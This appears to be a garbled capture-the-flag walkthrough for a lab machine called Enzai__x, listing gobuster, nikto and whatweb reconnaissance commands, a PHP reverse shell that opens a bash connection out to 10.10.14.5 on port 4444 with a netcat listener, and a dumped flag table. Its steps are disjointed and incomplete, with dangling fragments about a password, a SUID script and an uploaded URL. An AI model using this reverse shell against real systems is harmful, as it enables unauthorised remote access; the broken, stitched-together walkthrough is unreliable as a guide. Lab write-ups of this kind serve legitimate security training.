Enzai__x ❲Pro – How-To❳
The script ( P@ssw0rd! ). We can abuse the SUID to get the database dump (which contains the flag).
| Tool | Command | What it gives you |
|------|---------|-------------------|
| gobuster | `gobuster dir -u http://10.10.10.23 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html` | Lists hidden directories (`/admin`, `/uploads`, `/debug`). |
| nikto | `nikto -h http://10.10.10.23` | Finds outdated scripts, default files, and common vulnerabilities. |
| whatweb | `whatweb http://10.10.10.23` | Fingerprints the web app (e.g., “WordPress 5.0”, “PHP 7.2”). |
| jsbeautifier (manual) | Open any `.js` file → run through an online beautifier | May reveal hard-coded credentials or back-doors. |
Visit the uploaded URL in a browser or curl it:
We find a : /opt/enzai/scripts/ .
```bash
# 1️⃣ Create a reverse shell (php-reverse-shell.php)
cat > shell.php <<'EOF'
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'");
?>
EOF

# Listener for the callback on port 4444
nc -lvkp 4444
```

```
+----+-----------------------------------+
| id | flag                              |
+----+-----------------------------------+
|  1 | HTBEnzai_X_Exploited!             |
+----+-----------------------------------+
```